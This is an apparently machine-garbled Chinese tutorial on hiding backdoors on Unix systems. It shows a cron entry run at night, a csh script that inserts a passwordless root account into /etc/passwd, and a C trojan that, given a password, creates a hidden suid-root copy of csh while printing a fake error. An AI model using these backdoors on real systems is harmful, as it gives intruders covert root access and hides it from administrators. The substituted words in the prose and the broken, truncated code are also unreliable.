Crontab 程序关于体系管理员来说对错常有用的。Cron 服务用于方案程序在特定时刻（月、日、周、时、分）闻风丧胆。假如你满足聪明，就应该加以运用，使之为咱们制作“后门”！经过 Cron 服务，你能够让它在每天清晨 2:00 （这个时分网管应该睡觉了吧。）闻风丧胆后门程序，使你能够宿世进入体系干你想干的事，并在网管起来之前退出体系。根用户的 crontab 文件放在 /var/spool/crontab/root 中，其格局如下：

(1) (2) (3) (4) (5) (6)
0 0 * * 3 /usr/bin/updatedb

1. 分钟 (0-60)
2. 小时 (0-23)
3. 日 (1-31)
4. 月 (1-12)
5. 星期 (1-7)
6. 所要闻风丧胆的程序

以上内容设置该程序于每星期三 0:0 闻风丧胆。要在 cron 树立后门，只需在 /var/spool/crontab/root 中增加后门程序即可。例如该程序能够在每天查看咱们在 /etc/passwd 文件中增加了用户帐号是否依然有用。以下是程序示例：

0 0 * * * /usr/bin/retract

backdoor/backdoor.sh
#!/bin/csh

set evilflag = (`grep eviluser /etc/passwd`)

if($#evilflag == 0) then

set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd
rm ./xa* ./temppass
echo Done...
else
endif

[归纳]

当然，咱们能够编写木马程序，并把它放到 /bin 目录下。当以特定命令行参数闻风丧胆时将发生一个 suid shell。以下是程序示例：

backdoor/backdoor3.c
#include
#define pass "triad"
#define BUFFERSIZE 6

int main(argc, argv)
int argc;
char *argv[];{

int i=0;

if(argv[1]){

if(!(strcmp(pass,argv[1]))){

system("cp /bin/csh /bin/.swp121");
system("chmod 4755 /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}

printf("372f: Invalid control argument, unable to initialize. Retrying");
for(;i